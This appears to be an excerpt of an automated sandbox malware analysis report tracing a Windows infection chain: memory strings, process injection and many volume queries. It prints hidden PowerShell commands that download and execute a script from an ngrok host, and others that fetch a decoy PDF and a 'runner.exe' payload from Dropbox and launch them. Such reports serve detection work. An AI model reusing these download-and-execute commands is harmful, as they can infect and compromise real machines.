                      Source: svchost.exe, 00000006.00000002.3352248556.00000172B8E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0~%
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D25E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: fontdrvhost.exe, 0000001D.00000002.2842765861.0000000002BFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`z
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: fontdrvhost.exe, 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: svchost.exe, 00000006.00000002.3353970114.00000172BE254000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000002.2842765861.0000000002C56000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000002.2842765861.0000000002BFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: msedge.exe, 00000005.00000003.2303058778.000009BC00390000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                      Source: fontdrvhost.exe, 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000010.00000002.2590757159.00000293EA370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D25E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD4646E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: powershell.exe, 00000003.00000002.2483686822.000001DD5CBAA000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000005.00000002.2397320398.00000212D1E44000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2491873049.0000020640244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007A9098 VirtualAlloc,LdrInitializeThunk,VirtualFree,28_3_007A9098
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,27_2_004D7960
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_007A9277 mov eax, dword ptr fs:[00000030h]28_3_007A9277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 29_3_02AA0283 mov eax, dword ptr fs:[00000030h]29_3_02AA0283
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_0052B440 GetProcessHeap,HeapAlloc,27_2_0052B440
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Users\user\AppData\Local\Temp\1718218388.exe "C:\Users\user\AppData\Local\Temp\1718218388.exe"

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeMemory written: C:\Users\user\AppData\Local\Temp\1718218388.exe base: 770000 value starts with: 4D5A
                      Maps a DLL or memory area into another process
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\697963187.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1225428425.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1718218388.exe "C:\Users\user\AppData\Local\Temp\1718218388.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -outfile $randomexe ; start $randomexe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -outfile $randomexe ; start $randomexe"
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 28_3_0079CDD5 cpuid 28_3_0079CDD5
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,27_2_004C9670
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,28_2_004C9670
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
